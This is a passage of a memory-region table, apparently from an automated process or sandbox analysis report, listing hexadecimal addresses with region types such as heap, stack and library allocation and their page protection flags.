trusted library allocation
|
page read and write
|
||
18811F20000
|
heap
|
page read and write
|
||
7FF887078000
|
trusted library allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
242E7808000
|
heap
|
page read and write
|
||
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
BA6CFB000
|
stack
|
page read and write
|
||
D27000
|
heap
|
page read and write
|
||
7FF887180000
|
trusted library allocation
|
page read and write
|
||
177DD2BF000
|
trusted library allocation
|
page read and write
|
||
7FF886EF0000
|
trusted library allocation
|
page read and write
|
||
D20793E000
|
stack
|
page read and write
|
||
7DF433300000
|
trusted library allocation
|
page execute and read and write
|
||
2A97000
|
trusted library allocation
|
page read and write
|
||
2F7F789000
|
stack
|
page read and write
|
||
7FF8871A0000
|
trusted library allocation
|
page read and write
|
||
1CD4A76C000
|
heap
|
page read and write
|
||
1368F383000
|
trusted library allocation
|
page read and write
|
||
7FF886F20000
|
trusted library allocation
|
page read and write
|
||
1B26F000
|
stack
|
page read and write
|
||
7FF886D3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887180000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
1CD30390000
|
heap
|
page read and write
|
||
7FF88707A000
|
trusted library allocation
|
page read and write
|
||
1AE60000
|
heap
|
page execute and read and write
|
||
5E82000
|
heap
|
page read and write
|
||
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
BA67FE000
|
stack
|
page read and write
|
||
242D076E000
|
trusted library allocation
|
page read and write
|
||
1CD32D35000
|
trusted library allocation
|
page read and write
|
||
1B46E000
|
stack
|
page read and write
|
||
7FF887090000
|
trusted library allocation
|
page read and write
|
||
7FF887190000
|
trusted library allocation
|
page read and write
|
||
1CD4A66E000
|
heap
|
page read and write
|
||
242E7DD7000
|
heap
|
page read and write
|
||
7FF887084000
|
trusted library allocation
|
page read and write
|
||
7FF887060000
|
trusted library allocation
|
page read and write
|
||
7FF887160000
|
trusted library allocation
|
page read and write
|
||
1AD0F000
|
stack
|
page read and write
|
||
1368F3A0000
|
trusted library allocation
|
page read and write
|
||
4EF6000
|
trusted library allocation
|
page read and write
|
||
1CD30490000
|
trusted library section
|
page read and write
|
||
2AB1000
|
trusted library allocation
|
page read and write
|
||
177CB72D000
|
heap
|
page read and write
|
||
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
177CB716000
|
heap
|
page read and write
|
||
177CD2D7000
|
trusted library allocation
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
1705000
|
heap
|
page read and write
|
||
242D0BC1000
|
trusted library allocation
|
page read and write
|
||
13158000
|
trusted library allocation
|
page read and write
|
||
271B000
|
trusted library allocation
|
page read and write
|
||
7FF887020000
|
trusted library allocation
|
page read and write
|
||
7FF887040000
|
trusted library allocation
|
page read and write
|
||
7FF886D7C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
2A14000
|
trusted library allocation
|
page read and write
|
||
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
1B74E000
|
stack
|
page read and write
|
||
177E56F6000
|
heap
|
page read and write
|
||
7FF886E20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887011000
|
trusted library allocation
|
page read and write
|
||
1CD304A0000
|
trusted library allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
177CD240000
|
heap
|
page execute and read and write
|
||
D2074FE000
|
stack
|
page read and write
|
||
2A64000
|
trusted library allocation
|
page read and write
|
||
1368F38B000
|
trusted library allocation
|
page read and write
|
||
5C1F000
|
stack
|
page read and write
|
||
D16000
|
heap
|
page read and write
|
||
7FF887084000
|
trusted library allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
136A6BD0000
|
heap
|
page read and write
|
||
7FF886ED0000
|
trusted library allocation
|
page execute and read and write
|
||
177CD050000
|
heap
|
page read and write
|
||
177CCFC0000
|
trusted library section
|
page read and write
|
||
1368E3B0000
|
trusted library allocation
|
page read and write
|
||
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
1B6DD000
|
stack
|
page read and write
|
||
1B4EB000
|
stack
|
page read and write
|
||
7FF886D33000
|
trusted library allocation
|
page read and write
|
||
1C576000
|
heap
|
page read and write
|
||
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
242CDDDB000
|
heap
|
page read and write
|
||
121A000
|
heap
|
page read and write
|
||
5583D79000
|
stack
|
page read and write
|
||
2F7F68E000
|
stack
|
page read and write
|
||
1AEED000
|
stack
|
page read and write
|
||
54FE000
|
stack
|
page read and write
|
||
A00000
|
trusted library allocation
|
page read and write
|
||
177CB74D000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
1368CA15000
|
heap
|
page read and write
|
||
177E58A0000
|
heap
|
page read and write
|
||
271E000
|
trusted library allocation
|
page read and write
|
||
7FF886F12000
|
trusted library allocation
|
page read and write
|
||
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
177CDFC2000
|
trusted library allocation
|
page read and write
|
||
D20840E000
|
stack
|
page read and write
|
||
136A6C52000
|
heap
|
page read and write
|
||
242D0A11000
|
trusted library allocation
|
page read and write
|
||
242E7D62000
|
heap
|
page read and write
|
||
7FF887010000
|
trusted library allocation
|
page read and write
|
||
BA6A7B000
|
stack
|
page read and write
|
||
242CFA29000
|
trusted library allocation
|
page read and write
|
||
1CD30320000
|
heap
|
page read and write
|
||
242D09D8000
|
trusted library allocation
|
page read and write
|
||
1368F1E0000
|
trusted library allocation
|
page read and write
|
||
1369E451000
|
trusted library allocation
|
page read and write
|
||
1BB30000
|
heap
|
page read and write
|
||
6DF000
|
stack
|
page read and write
|
||
136A68C0000
|
heap
|
page read and write
|
||
1368E350000
|
trusted library allocation
|
page read and write
|
||
7FF886DCC000
|
trusted library allocation
|
page execute and read and write
|
||
177CB733000
|
heap
|
page read and write
|
||
7FF886ED0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
5584D87000
|
stack
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
1CD31DD1000
|
trusted library allocation
|
page read and write
|
||
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
225F000
|
trusted library allocation
|
page read and write
|
||
2F7E57E000
|
stack
|
page read and write
|
||
7DF4EE7B0000
|
trusted library allocation
|
page execute and read and write
|
||
136A6D0B000
|
heap
|
page read and write
|
||
5D1E000
|
stack
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
2F7E6FE000
|
stack
|
page read and write
|
||
177E59BA000
|
heap
|
page read and write
|
||
2420000
|
trusted library allocation
|
page read and write
|
||
177E596F000
|
heap
|
page read and write
|
||
136A6D12000
|
heap
|
page read and write
|
||
177E5A21000
|
heap
|
page read and write
|
||
1CD4A2C6000
|
heap
|
page execute and read and write
|
||
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
7FF886D03000
|
trusted library allocation
|
page execute and read and write
|
||
1368F02E000
|
trusted library allocation
|
page read and write
|
||
29AA000
|
trusted library allocation
|
page read and write
|
||
7FF886EC1000
|
trusted library allocation
|
page read and write
|
||
242DF801000
|
trusted library allocation
|
page read and write
|
||
D63000
|
heap
|
page read and write
|
||
7FF887095000
|
trusted library allocation
|
page read and write
|
||
1CD4A34F000
|
heap
|
page read and write
|
||
1CD329BA000
|
trusted library allocation
|
page read and write
|
||
7FF886D4B000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F61000
|
trusted library allocation
|
page read and write
|
||
7FF887170000
|
trusted library allocation
|
page read and write
|
||
2A93000
|
trusted library allocation
|
page read and write
|
||
177E57C0000
|
heap
|
page read and write
|
||
7FF886DC6000
|
trusted library allocation
|
page read and write
|
||
7FF886E30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
242E7D58000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
7FF886D6C000
|
trusted library allocation
|
page execute and read and write
|
||
242E808B000
|
heap
|
page read and write
|
||
7DF433310000
|
trusted library allocation
|
page execute and read and write
|
||
4FE0000
|
trusted library allocation
|
page execute and read and write
|
||
177CE611000
|
trusted library allocation
|
page read and write
|
||
2A10000
|
trusted library allocation
|
page read and write
|
||
1AE7E000
|
stack
|
page read and write
|
||
1368E8EE000
|
trusted library allocation
|
page read and write
|
||
7FF887000000
|
trusted library allocation
|
page read and write
|
||
D2C000
|
heap
|
page read and write
|
||
CF6000
|
heap
|
page read and write
|
||
9E5000
|
heap
|
page read and write
|
||
6BE000
|
heap
|
page read and write
|
||
242CDDAE000
|
heap
|
page read and write
|
||
1368E340000
|
heap
|
page readonly
|
||
2A51000
|
trusted library allocation
|
page read and write
|
||
7FF886DCE000
|
trusted library allocation
|
page execute and read and write
|
||
177CEAB8000
|
trusted library allocation
|
page read and write
|
||
1CD4A2C0000
|
heap
|
page execute and read and write
|
||
7FF886DE0000
|
trusted library allocation
|
page execute and read and write
|
||
1245000
|
heap
|
page read and write
|
||
7FF887069000
|
trusted library allocation
|
page read and write
|
||
7FF886F00000
|
trusted library allocation
|
page read and write
|
||
1368FCAD000
|
trusted library allocation
|
page read and write
|
||
136A69B5000
|
heap
|
page read and write
|
||
136A6CCE000
|
heap
|
page read and write
|
||
2F7E4FE000
|
stack
|
page read and write
|
||
177CD0EE000
|
heap
|
page read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
510E000
|
stack
|
page read and write
|
||
7FF886F14000
|
trusted library allocation
|
page read and write
|
||
242D05ED000
|
trusted library allocation
|
page read and write
|
||
7FF887130000
|
trusted library allocation
|
page read and write
|
||
7FF886D3D000
|
trusted library allocation
|
page execute and read and write
|
||
1CD33078000
|
trusted library allocation
|
page read and write
|
||
7FF887043000
|
trusted library allocation
|
page read and write
|
||
136A6E60000
|
heap
|
page read and write
|
||
13151000
|
trusted library allocation
|
page read and write
|
||
242E7DDF000
|
heap
|
page read and write
|
||
136A6914000
|
heap
|
page read and write
|
||
7FF886F49000
|
trusted library allocation
|
page read and write
|
||
5583C79000
|
stack
|
page read and write
|
||
1CD30380000
|
trusted library section
|
page read and write
|
||
7FF886D2B000
|
trusted library allocation
|
page read and write
|
||
1C880000
|
heap
|
page read and write
|
||
13153000
|
trusted library allocation
|
page read and write
|
||
177CD000000
|
trusted library allocation
|
page read and write
|
||
7FF887098000
|
trusted library allocation
|
page read and write
|
||
7FF886D6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
242E7DD3000
|
heap
|
page read and write
|
||
D207479000
|
stack
|
page read and write
|
||
242E7F43000
|
heap
|
page read and write
|
||
242CF610000
|
trusted library allocation
|
page read and write
|
||
2251000
|
trusted library allocation
|
page read and write
|
||
2F7EC3F000
|
stack
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
D32000
|
heap
|
page read and write
|
||
1045000
|
heap
|
page read and write
|
||
242CDD50000
|
heap
|
page read and write
|
||
55841BF000
|
stack
|
page read and write
|
||
1368F50E000
|
trusted library allocation
|
page read and write
|
||
CE5000
|
heap
|
page read and write
|
||
7FF886EEA000
|
trusted library allocation
|
page read and write
|
||
121F000
|
heap
|
page read and write
|
||
242CF87B000
|
trusted library allocation
|
page read and write
|
||
1CD41DF1000
|
trusted library allocation
|
page read and write
|
||
7FF886DF6000
|
trusted library allocation
|
page execute and read and write
|
||
84B1C79000
|
stack
|
page read and write
|
||
164000
|
unkown
|
page readonly
|
||
242CF630000
|
trusted library allocation
|
page read and write
|
||
7FF886E35000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D3D000
|
trusted library allocation
|
page execute and read and write
|
||
1CD33BAE000
|
trusted library allocation
|
page read and write
|
||
1CD4A377000
|
heap
|
page read and write
|
||
177E5697000
|
heap
|
page execute and read and write
|
||
1003000
|
trusted library allocation
|
page read and write
|
||
2A46000
|
trusted library allocation
|
page read and write
|
||
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
14AF000
|
stack
|
page read and write
|
||
7FF88707C000
|
trusted library allocation
|
page read and write
|
||
1CD32D30000
|
trusted library allocation
|
page read and write
|
||
1BC3E000
|
stack
|
page read and write
|
||
22C0000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
177CB6F8000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
7FF886EF0000
|
trusted library allocation
|
page execute and read and write
|
||
1B06F000
|
stack
|
page read and write
|
||
7FF887040000
|
trusted library allocation
|
page read and write
|
||
177E58E8000
|
heap
|
page read and write
|
||
51C000
|
heap
|
page read and write
|
||
1B54E000
|
stack
|
page read and write
|
||
7FF886EF0000
|
trusted library allocation
|
page execute and read and write
|
||
29E8000
|
trusted library allocation
|
page read and write
|
||
136A69BB000
|
heap
|
page read and write
|
||
2F7E878000
|
stack
|
page read and write
|
||
1B076000
|
heap
|
page read and write
|
||
18811E20000
|
heap
|
page read and write
|
||
1CD30500000
|
trusted library allocation
|
page read and write
|
||
177CB6B0000
|
heap
|
page read and write
|
||
7FF88709C000
|
trusted library allocation
|
page read and write
|
||
1CD41DD1000
|
trusted library allocation
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
7C8000
|
unkown
|
page readonly
|
||
1B67E000
|
stack
|
page read and write
|
||
7FF887010000
|
trusted library allocation
|
page read and write
|
||
12253000
|
trusted library allocation
|
page read and write
|
||
7FF887070000
|
trusted library allocation
|
page read and write
|
||
177CE4F6000
|
trusted library allocation
|
page read and write
|
||
242DFAEE000
|
trusted library allocation
|
page read and write
|
||
1B3AE000
|
stack
|
page read and write
|
||
D34000
|
heap
|
page read and write
|
||
177E58B0000
|
heap
|
page read and write
|
||
1368FD6E000
|
trusted library allocation
|
page read and write
|
||
177CD479000
|
trusted library allocation
|
page read and write
|
||
D20858E000
|
stack
|
page read and write
|
||
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
5E1E000
|
stack
|
page read and write
|
||
C94000
|
heap
|
page read and write
|
||
12423000
|
trusted library allocation
|
page read and write
|
||
4EF1000
|
trusted library allocation
|
page read and write
|
||
2723000
|
trusted library allocation
|
page read and write
|
||
2240000
|
heap
|
page read and write
|
||
7FF887063000
|
trusted library allocation
|
page read and write
|
||
315D000
|
trusted library allocation
|
page read and write
|
||
177CE256000
|
trusted library allocation
|
page read and write
|
||
1368E320000
|
trusted library allocation
|
page read and write
|
||
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
7FF886D13000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
1CD4A2D0000
|
heap
|
page read and write
|
||
990000
|
trusted library allocation
|
page read and write
|
||
242CDFE5000
|
heap
|
page read and write
|
||
18811E29000
|
heap
|
page read and write
|
||
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
7FF887195000
|
trusted library allocation
|
page read and write
|
||
7FF887050000
|
trusted library allocation
|
page read and write
|
||
1368E2C0000
|
heap
|
page read and write
|
||
7FF887060000
|
trusted library allocation
|
page read and write
|
||
FCE000
|
stack
|
page read and write
|
||
7FF886E50000
|
trusted library allocation
|
page execute and read and write
|
||
DB4000
|
heap
|
page read and write
|
||
2A0E000
|
trusted library allocation
|
page read and write
|
||
7FF886D4D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D13000
|
trusted library allocation
|
page execute and read and write
|
||
1C125000
|
stack
|
page read and write
|
||
1368E300000
|
trusted library allocation
|
page read and write
|
||
57D000
|
heap
|
page read and write
|
||
1670000
|
heap
|
page read and write
|
||
7FF887120000
|
trusted library allocation
|
page read and write
|
||
1A990000
|
trusted library allocation
|
page read and write
|
||
1CEB9000
|
stack
|
page read and write
|
||
1CD420DB000
|
trusted library allocation
|
page read and write
|
||
177DD556000
|
trusted library allocation
|
page read and write
|
||
1C55F000
|
heap
|
page read and write
|
||
136A6D07000
|
heap
|
page read and write
|
||
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
5583FBA000
|
stack
|
page read and write
|
||
242CDD96000
|
heap
|
page read and write
|
||
2F7ECBB000
|
stack
|
page read and write
|
||
7FF886DDC000
|
trusted library allocation
|
page execute and read and write
|
||
177E5A02000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
AF1000
|
stack
|
page read and write
|
||
242E801F000
|
heap
|
page read and write
|
||
7FF886EF8000
|
trusted library allocation
|
page read and write
|
||
177CE9D3000
|
trusted library allocation
|
page read and write
|
||
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
1CD33BF3000
|
trusted library allocation
|
page read and write
|
||
2F7E473000
|
stack
|
page read and write
|
||
D207678000
|
stack
|
page read and write
|
||
177CCFA0000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
D2078BE000
|
stack
|
page read and write
|
||
7FF887160000
|
trusted library allocation
|
page read and write
|
||
3699000
|
trusted library allocation
|
page read and write
|
||
5583CFE000
|
stack
|
page read and write
|
||
5583AFD000
|
stack
|
page read and write
|
||
242D05B9000
|
trusted library allocation
|
page read and write
|
||
7FF886ED2000
|
trusted library allocation
|
page read and write
|
||
7DF4EE7A0000
|
trusted library allocation
|
page execute and read and write
|
||
242E80AB000
|
heap
|
page read and write
|
||
1369E661000
|
trusted library allocation
|
page read and write
|
||
1CD30220000
|
heap
|
page read and write
|
||
177CD090000
|
trusted library allocation
|
page read and write
|
||
BA667E000
|
stack
|
page read and write
|
||
1CD303DB000
|
heap
|
page read and write
|
||
911000
|
heap
|
page read and write
|
||
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887167000
|
trusted library allocation
|
page read and write
|
||
242CDD75000
|
heap
|
page read and write
|
||
7FF887136000
|
trusted library allocation
|
page read and write
|
||
D208609000
|
stack
|
page read and write
|
||
BA774C000
|
stack
|
page read and write
|
||
242CF6A0000
|
trusted library allocation
|
page read and write
|
||
242DF831000
|
trusted library allocation
|
page read and write
|
||
7FF886FE4000
|
trusted library allocation
|
page read and write
|
||
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
177CB72A000
|
heap
|
page read and write
|
||
242D08BF000
|
trusted library allocation
|
page read and write
|
||
1CDB8000
|
stack
|
page read and write
|
||
177CD060000
|
trusted library allocation
|
page read and write
|
||
7FF886E06000
|
trusted library allocation
|
page execute and read and write
|
||
25DE000
|
stack
|
page read and write
|
||
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
1368C989000
|
heap
|
page read and write
|
||
1CD304E0000
|
heap
|
page read and write
|
||
242D1090000
|
trusted library allocation
|
page read and write
|
||
177CD0D0000
|
heap
|
page read and write
|
||
1CD304C0000
|
trusted library allocation
|
page read and write
|
||
7FF886DF6000
|
trusted library allocation
|
page execute and read and write
|
||
177CEBA0000
|
trusted library allocation
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
2A77000
|
trusted library allocation
|
page read and write
|
||
1CD32822000
|
trusted library allocation
|
page read and write
|
||
1B440000
|
heap
|
page execute and read and write
|
||
2745000
|
trusted library allocation
|
page read and write
|
||
4FB0000
|
trusted library allocation
|
page execute and read and write
|
||
5DC000
|
heap
|
page read and write
|
||
1BB1F000
|
stack
|
page read and write
|
||
1CD303D3000
|
heap
|
page read and write
|
||
4B08000
|
trusted library allocation
|
page read and write
|
||
1CD303A2000
|
heap
|
page read and write
|
||
136A6DD0000
|
trusted library allocation
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
7FF88710D000
|
trusted library allocation
|
page read and write
|
||
1CD31CD0000
|
trusted library allocation
|
page read and write
|
||
7FF886D8C000
|
trusted library allocation
|
page execute and read and write
|
||
D5E000
|
heap
|
page read and write
|
||
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
558413F000
|
stack
|
page read and write
|
||
1CD4A640000
|
heap
|
page read and write
|
||
7FF886DBC000
|
trusted library allocation
|
page execute and read and write
|
||
242D1602000
|
trusted library allocation
|
page read and write
|
||
1CD41E44000
|
trusted library allocation
|
page read and write
|
||
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
715000
|
heap
|
page read and write
|
||
1CD30360000
|
heap
|
page read and write
|
||
2A5C000
|
trusted library allocation
|
page read and write
|
||
5080000
|
trusted library allocation
|
page execute and read and write
|
||
1368C9C3000
|
heap
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
1BF0F000
|
stack
|
page read and write
|
||
177CD020000
|
trusted library allocation
|
page read and write
|
||
129DD000
|
trusted library allocation
|
page read and write
|
||
4E0000
|
heap
|
page read and write
|
||
5583A73000
|
stack
|
page read and write
|
||
242CF6B0000
|
heap
|
page read and write
|
||
177E5680000
|
trusted library allocation
|
page read and write
|
||
BA68FE000
|
stack
|
page read and write
|
||
18812015000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
1CD32D39000
|
trusted library allocation
|
page read and write
|
||
7FF887080000
|
trusted library allocation
|
page read and write
|
||
177CEADE000
|
trusted library allocation
|
page read and write
|
||
7FF886F43000
|
trusted library allocation
|
page read and write
|
||
1368E380000
|
trusted library allocation
|
page read and write
|
||
505D000
|
trusted library allocation
|
page read and write
|
||
7FF88709C000
|
trusted library allocation
|
page read and write
|
||
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
5584C0E000
|
stack
|
page read and write
|
||
1369E441000
|
trusted library allocation
|
page read and write
|
||
1AD70000
|
heap
|
page execute and read and write
|
||
7FF887130000
|
trusted library allocation
|
page read and write
|
||
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
7FF887043000
|
trusted library allocation
|
page read and write
|
||
7FF8871A0000
|
trusted library allocation
|
page read and write
|
||
171000
|
stack
|
page read and write
|
||
7FF887021000
|
trusted library allocation
|
page read and write
|
||
2A06000
|
trusted library allocation
|
page read and write
|
||
1CD4A7A6000
|
heap
|
page read and write
|
||
242E8008000
|
heap
|
page read and write
|
||
242E7DCF000
|
heap
|
page read and write
|
||
7FF886EC2000
|
trusted library allocation
|
page read and write
|
||
177E58F0000
|
heap
|
page read and write
|
||
136A6C58000
|
heap
|
page read and write
|
||
2261000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
242D0F84000
|
trusted library allocation
|
page read and write
|
||
177CD251000
|
trusted library allocation
|
page read and write
|
||
12258000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
5584E0C000
|
stack
|
page read and write
|
||
7FF887089000
|
trusted library allocation
|
page read and write
|
||
242CF7F5000
|
heap
|
page read and write
|
||
242E7D06000
|
heap
|
page execute and read and write
|
||
5583DFD000
|
stack
|
page read and write
|
||
12A53000
|
trusted library allocation
|
page read and write
|
||
BA6AF8000
|
stack
|
page read and write
|
||
D207838000
|
stack
|
page read and write
|
||
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
1CD304E5000
|
heap
|
page read and write
|
||
7FF887050000
|
trusted library allocation
|
page read and write
|
||
1D1BC000
|
stack
|
page read and write
|
||
BA677A000
|
stack
|
page read and write
|
||
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
7DF4064A0000
|
trusted library allocation
|
page execute and read and write
|
||
1B7EE000
|
stack
|
page read and write
|
||
340000
|
unkown
|
page readonly
|
||
177CCFD0000
|
trusted library section
|
page read and write
|
||
611000
|
heap
|
page read and write
|
||
D207272000
|
stack
|
page read and write
|
||
FF0000
|
trusted library allocation
|
page read and write
|
||
177E5A0F000
|
heap
|
page read and write
|
||
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
66F000
|
heap
|
page read and write
|
||
1500000
|
trusted library allocation
|
page read and write
|
||
7FF886D34000
|
trusted library allocation
|
page read and write
|
||
242D1069000
|
trusted library allocation
|
page read and write
|
||
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
7FF887040000
|
trusted library allocation
|
page read and write
|
||
242E7DCB000
|
heap
|
page read and write
|
||
7FF886E30000
|
trusted library allocation
|
page execute and read and write
|
||
1CD30480000
|
heap
|
page read and write
|
||
1218000
|
heap
|
page read and write
|
||
7FF887090000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
272F000
|
trusted library allocation
|
page read and write
|
||
246E000
|
stack
|
page read and write
|
||
7FF887150000
|
trusted library allocation
|
page read and write
|
||
242D1627000
|
trusted library allocation
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
121C000
|
heap
|
page read and write
|
||
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
1BE0F000
|
stack
|
page read and write
|
||
D2073FE000
|
stack
|
page read and write
|
||
242DFAF8000
|
trusted library allocation
|
page read and write
|
||
177CD0D5000
|
heap
|
page read and write
|
||
242E80B1000
|
heap
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
242DFAF6000
|
trusted library allocation
|
page read and write
|
||
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
7DF4A5450000
|
trusted library allocation
|
page execute and read and write
|
||
177CDCA3000
|
trusted library allocation
|
page read and write
|
||
7FF88711C000
|
trusted library allocation
|
page read and write
|
||
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
242DF810000
|
trusted library allocation
|
page read and write
|
||
7FF886DE6000
|
trusted library allocation
|
page read and write
|
||
970000
|
trusted library allocation
|
page read and write
|
||
177E56FA000
|
heap
|
page read and write
|
||
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
740000
|
trusted library allocation
|
page read and write
|
||
F4E000
|
stack
|
page read and write
|
||
1BF2D000
|
stack
|
page read and write
|
||
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
177CE429000
|
trusted library allocation
|
page read and write
|
||
242CF620000
|
heap
|
page readonly
|
||
7FF887078000
|
trusted library allocation
|
page read and write
|
||
1CD3363A000
|
trusted library allocation
|
page read and write
|
||
1CCBA000
|
stack
|
page read and write
|
||
2F7F88C000
|
stack
|
page read and write
|
||
7FF887190000
|
trusted library allocation
|
page read and write
|
||
7FF886F18000
|
trusted library allocation
|
page read and write
|
||
4FC0000
|
trusted library allocation
|
page read and write
|
||
5584E8E000
|
stack
|
page read and write
|
||
4E8000
|
heap
|
page read and write
|
||
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
84B1D7F000
|
stack
|
page read and write
|
||
7FF887080000
|
trusted library allocation
|
page read and write
|
||
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
1585000
|
heap
|
page read and write
|
||
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
1CD4A713000
|
heap
|
page read and write
|
||
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
225D000
|
trusted library allocation
|
page read and write
|
||
177E5690000
|
heap
|
page execute and read and write
|
||
7FF886F00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887190000
|
trusted library allocation
|
page read and write
|
||
1CD31FF9000
|
trusted library allocation
|
page read and write
|
||
240B000
|
trusted library allocation
|
page execute and read and write
|
||
1368F024000
|
trusted library allocation
|
page read and write
|
||
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
667000
|
heap
|
page read and write
|
||
7FF886EF2000
|
trusted library allocation
|
page read and write
|
||
1368C981000
|
heap
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
1B82E000
|
stack
|
page read and write
|
||
1B3B0000
|
heap
|
page execute and read and write
|
||
7FF886E40000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887072000
|
trusted library allocation
|
page read and write
|
||
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
7FF886D8C000
|
trusted library allocation
|
page execute and read and write
|
||
4F0E000
|
trusted library allocation
|
page read and write
|
||
242CF7F0000
|
heap
|
page read and write
|
||
7FF886DF6000
|
trusted library allocation
|
page execute and read and write
|
||
1CD32D45000
|
trusted library allocation
|
page read and write
|
||
177CE30F000
|
trusted library allocation
|
page read and write
|
||
29CE000
|
trusted library allocation
|
page read and write
|
||
1AC00000
|
heap
|
page read and write
|
||
2910000
|
heap
|
page read and write
|
||
177CF071000
|
trusted library allocation
|
page read and write
|
||
1369E70E000
|
trusted library allocation
|
page read and write
|
||
7FF8870C0000
|
trusted library allocation
|
page read and write
|
||
7FF88707C000
|
trusted library allocation
|
page read and write
|
||
1369E728000
|
trusted library allocation
|
page read and write
|
||
2AB5000
|
trusted library allocation
|
page read and write
|
||
7FF886DEC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
7FF886F00000
|
trusted library allocation
|
page execute and read and write
|
||
D2072FE000
|
stack
|
page read and write
|
||
242E7F10000
|
heap
|
page read and write
|
||
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
1368FD10000
|
trusted library allocation
|
page read and write
|
||
7FF886EC4000
|
trusted library allocation
|
page read and write
|
||
12A58000
|
trusted library allocation
|
page read and write
|
||
1CD4A78D000
|
heap
|
page read and write
|
||
1368F387000
|
trusted library allocation
|
page read and write
|
||
5040000
|
trusted library allocation
|
page read and write
|
||
242CDD00000
|
heap
|
page read and write
|
||
177E58B4000
|
heap
|
page read and write
|
||
1ACA0000
|
heap
|
page read and write
|
||
1CD33BD3000
|
trusted library allocation
|
page read and write
|
||
7FF887000000
|
trusted library allocation
|
page read and write
|
||
1368F7E1000
|
trusted library allocation
|
page read and write
|
||
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887010000
|
trusted library allocation
|
page read and write
|
||
7FF887083000
|
